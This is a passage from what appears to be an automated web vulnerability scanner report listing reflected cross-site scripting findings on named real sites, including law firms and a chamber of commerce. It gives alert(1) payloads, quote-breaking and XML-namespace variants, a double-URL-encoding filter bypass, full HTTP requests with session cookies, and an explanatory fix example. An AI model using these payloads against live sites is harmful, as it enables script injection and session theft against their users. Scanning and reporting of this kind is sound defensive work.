User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Wed, 19 Jan 2011 15:48:20 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86367
Expires: Thu, 20 Jan 2011 15:47:47 GMT
Date: Wed, 19 Jan 2011 15:48:20 GMT
Content-Length: 22012
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d392"><script>alert(1)</script>ceb88aaba32 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /chamber6d392"><script>alert(1)</script>ceb88aaba32/memberDetail.asp HTTP/1.1
Host: www.dcchamber.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 404 Not Found
Date: Wed, 19 Jan 2011 15:48:15 GMT
Server: Apache/2.0.63 (Red Hat)
Set-Cookie: PHPSESSID=0ilpmfogoftmdtsc2djk1fdtm3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>DC Chamber of Commer ...[SNIP]... <a href="/chamber6d392"><script>alert(1)</script>ceb88aaba32/memberDetail.aspindex.php?src=gendocs&ref=ERROR&link=ERROR&login="> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12668"><script>alert(1)</script>2f451230e52 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /chamber/memberDetail.asp12668"><script>alert(1)</script>2f451230e52 HTTP/1.1
Host: www.dcchamber.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 404 Not Found
Date: Wed, 19 Jan 2011 15:48:20 GMT
Server: Apache/2.0.63 (Red Hat)
Set-Cookie: PHPSESSID=pkp73ol8c1315pd6btr3ijgkr3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>DC Chamber of Commer ...[SNIP]... <a href="/chamber/memberDetail.asp12668"><script>alert(1)</script>2f451230e52index.php?src=gendocs&ref=ERROR&link=ERROR&login="> ...[SNIP]...
The value of the db request parameter is copied into the HTML document as plain text between tags. The payload e00cf<script>alert(1)</script>182e67954d6 was submitted in the db parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cgi-bin/classifieds/classifieds.cgi?db=rentalse00cf<script>alert(1)</script>182e67954d6 HTTP/1.1
Host: www.dcregistry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:48:03 GMT
Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 528

We're sorry, but the script was unable to require /usr/home/dcreg/public_html/www.dcregistry.com/cgi-bin/classifieds/db/rentalse00cf<script>alert(1)</script>182e67954d6.db at line 215 in classifieds.cgi. Please make sure that these files exist, that you have the path set correctly, and that the permissions are set properly. This message could also indicate that a s ...[SNIP]...
4.106. http://www.ebglaw.com/showoffice.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ebglaw.com
Path: /showoffice.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 45f31'><script>alert(1)</script>f88730a84f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /showoffice.aspx?Show=542&45f31'><script>alert(1)</script>f88730a84f4=1 HTTP/1.1
Host: www.ebglaw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:48:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Pragma: no-cache
Set-Cookie: ASP.NET_SessionId=wiqyja45mfzer0uwjqmgms45; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 63794

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head pro ...[SNIP]... <a href='showoffice.aspx?Show=542&45f31'><script>alert(1)</script>f88730a84f4=1&PrintPage=True'> ...[SNIP]...
4.107. http://www.ebglaw.com/showoffice.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ebglaw.com
Path: /showoffice.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a79d'-alert(1)-'f0c22b0c26f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /showoffice.aspx?Show=542&5a79d'-alert(1)-'f0c22b0c26f=1 HTTP/1.1
Host: www.ebglaw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:48:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Pragma: no-cache
Set-Cookie: ASP.NET_SessionId=xxbjjcegd5hxmw55jxay4l3b; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 63749

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head pro ...[SNIP]... <350) { location.href='showoffice.aspx?Show=542&5a79d'-alert(1)-'f0c22b0c26f=1&mobile=True' }
The value of the eTitle request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94895"><script>alert(1)</script>288abb3048 was submitted in the eTitle parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.cfm?fuseaction=correspondence.emailform&site_id=299&eTitle=Washington%2C%20D%2EC%2E94895"><script>alert(1)</script>288abb3048 HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:49:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;path=/
Set-Cookie: CFTOKEN=35971701;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A16%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D369%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:16 GMT;path=/
Content-Type: text/html; charset=UTF-8

<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The value of the eTitle request parameter is copied into the HTML document as plain text between tags. The payload 8d254<script>alert(1)</script>39610b88ceb was submitted in the eTitle parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.cfm?fuseaction=correspondence.emailform&site_id=299&eTitle=Washington%2C%20D%2EC%2E8d254<script>alert(1)</script>39610b88ceb HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:49:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;path=/
Set-Cookie: CFTOKEN=35971701;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A17%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D395%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:17 GMT;path=/
Content-Type: text/html; charset=UTF-8

<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The value of the fuseaction request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 145fe"><script>alert(1)</script>aed5c335ef1 was submitted in the fuseaction parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.cfm?fuseaction=news.site145fe"><script>alert(1)</script>aed5c335ef1&site_id=299 HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:49:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;path=/
Set-Cookie: CFTOKEN=35971701;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A00%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D210%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:00 GMT;path=/
Content-Type: text/html; charset=UTF-8

<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The value of the fuseaction request parameter is copied into the HTML document as plain text between tags. The payload 6f457<script>alert(1)</script>e9f570c8d27 was submitted in the fuseaction parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.cfm?fuseaction=news.site6f457<script>alert(1)</script>e9f570c8d27&site_id=299 HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:49:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;path=/
Set-Cookie: CFTOKEN=35971701;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A02%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D218%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:02 GMT;path=/
Content-Type: text/html; charset=UTF-8

<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
...[SNIP]... </h2>
I received a fuseaction called "news.site6f457<script>alert(1)</script>e9f570c8d27" I don't know what to do with!<br> ...[SNIP]...
4.112. http://www.fulbright.com/index.cfm [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.fulbright.com
Path: /index.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fed44"><script>alert(1)</script>c707a822c6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.cfm?fuseaction=news.site&site_id=299&fed44"><script>alert(1)</script>c707a822c6a=1 HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:49:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;path=/
Set-Cookie: CFTOKEN=35971701;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A39%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D575%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:39 GMT;path=/
Content-Type: text/html; charset=UTF-8

<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The value of the pf request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 660d3"><script>alert(1)</script>39aa8a72e69 was submitted in the pf parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.cfm?FUSEACTION=home.299&pf=y660d3"><script>alert(1)</script>39aa8a72e69 HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:48:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;path=/
Set-Cookie: CFTOKEN=35971701;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A48%3A52%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D161%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:48:52 GMT;path=/
Content-Type: text/html; charset=UTF-8

<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The value of the rss request parameter is copied into the value of an XML tag attribute which is encapsulated in double quotation marks. The payload 1c76a"><a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>2edafab2731 was submitted in the rss parameter. This input was echoed as 1c76a"><a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>2edafab2731 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
Request
GET /index.cfm?fuseaction=news.allrss&site_id=286&rss=y1c76a"><a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>2edafab2731 HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:49:44 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=24113095;path=/ Set-Cookie: CFTOKEN=35971701;path=/ Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A44%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D626%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:44 GMT;path=/ Content-Type: text/xml
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The value of the tch request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 39b16(a)5ca85e9080f was submitted in the tch parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search?sclient=psy&hl=en&q=washington%2C+dc+law+office&aq=f&aqi=&aql=&oq=&pbx=1&fp=f478bdfafcb0c911&tch=139b16(a)5ca85e9080f&ech=1&psi=WP42TYixLcOclgf_yNGIAw12954497006263 HTTP/1.1 Host: www.google.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=washington%2C+dc+law Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Avail-Dictionary: GeNLY2f- Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2ee2d%253cscript%253ealert%25281%2529%253c%252fscript%253e72356283334 was submitted in the REST URL parameter 1. This input was echoed as 2ee2d<script>alert(1)</script>72356283334 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /washington%20dc%20law%20firms2ee2d%253cscript%253ealert%25281%2529%253c%252fscript%253e72356283334 HTTP/1.1 Host: www.info.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Info.com - washington dc law firms2ee2d%3cscript%3ealert%281%29%3c%2fscript%3e72356283334 - www.Info.com</title><l ...[SNIP]... <a href="http://Info.com/searchw?qkw=washington+dc+law+firms+2ee2d%3Cscript%3Ealert%281%29%3C%2Fscript%3E72356283334&r_cop=spell" style="text-decoration:underline">washington dc law firms 2ee2d<script>alert(1)</script>72356283334</a> ...[SNIP]...
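The remediation note above (validate only after canonicalisation, and do not decode a second time when the web server has already decoded once) is easy to get wrong in code. The following is an added example, not code from info.com or from the scanner: it models the ordering mistake with the report's own double-encoded path, then shows the corrected order with output encoding for the HTML text context. The handler names and the `<b>` template are assumed.

```javascript
// Added example, not code from info.com or the scanner. The web server has
// already URL-decoded the path once; the application's character filter runs
// on that value; only afterwards does a second, unnecessary decode turn %3c
// into '<'. Handler names and the output template are assumed.

// Raw request-line path exactly as sent in the report.
const RAW_PATH = '/washington%20dc%20law%20firms2ee2d%253cscript%253ealert%25281%2529%253c%252fscript%253e72356283334';

// decodeURIComponent throws on a stray '%'; keep the input unchanged in that case.
function decodeOrKeep(s) {
  try { return decodeURIComponent(s); } catch (e) { return s; }
}

// One decode is what the web server (IIS, Apache, ...) performs before the
// application ever sees the value.
function serverDecode(rawPath) {
  return decodeOrKeep(rawPath).slice(1); // drop the leading '/'
}

// Output encoding for the HTML text context ("plain text between tags").
function encodeHtmlText(s) {
  return s.replace(/[&<>"']/g, ch => '&#' + ch.charCodeAt(0) + ';');
}

// Vulnerable ordering: filter first, canonicalise second, no output encoding.
function vulnerableHandler(rawPath) {
  const afterServer = serverDecode(rawPath);          // '...2ee2d%3cscript%3e...'
  if (/[<>]/.test(afterServer)) return { blocked: true, html: null };
  const term = decodeOrKeep(afterServer);             // second decode: '<' is now present
  return { blocked: false, html: '<b>' + term + '</b>' };
}

// Fixed ordering: no second decode; validate the canonical value; always
// encode for the output context, so the filter is defence in depth only.
function fixedHandler(rawPath) {
  const term = serverDecode(rawPath);
  if (/[<>]/.test(term)) return { blocked: true, html: null };
  return { blocked: false, html: '<b>' + encodeHtmlText(term) + '</b>' };
}
```

Note that the report's own response shows both code paths at once: the page title contains the single-decoded `%3cscript%3e` form, while the link text contains the decoded `<script>` tag, so only one of the two rendering paths performs the extra decode.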
4.117. http://www.jonesdaydiversity.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.jonesdaydiversity.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d512'-alert(1)-'f727d73fb9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?2d512'-alert(1)-'f727d73fb9=1 HTTP/1.1 Host: www.jonesdaydiversity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html>
<head> <title id="ctl00_htmlTitle">Jones Day Diversity</title> <link rel="stylesheet" ...[SNIP]... <![CDATA[ var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/Home.aspx?2d512'-alert(1)-'f727d73fb9=1';//]]> ...[SNIP]...
4.118. http://www.learnestateplanning.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.learnestateplanning.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload faa91"><script>alert(1)</script>3a8a42ea6f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?faa91"><script>alert(1)</script>3a8a42ea6f9=1 HTTP/1.1 Host: www.learnestateplanning.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 19 Jan 2011 16:52:08 GMT Content-type: text/html Connection: close
The value of the CID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7005"style%3d"x%3aexpression(alert(1))"e433a090613 was submitted in the CID parameter. This input was echoed as b7005"style="x:expression(alert(1))"e433a090613 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
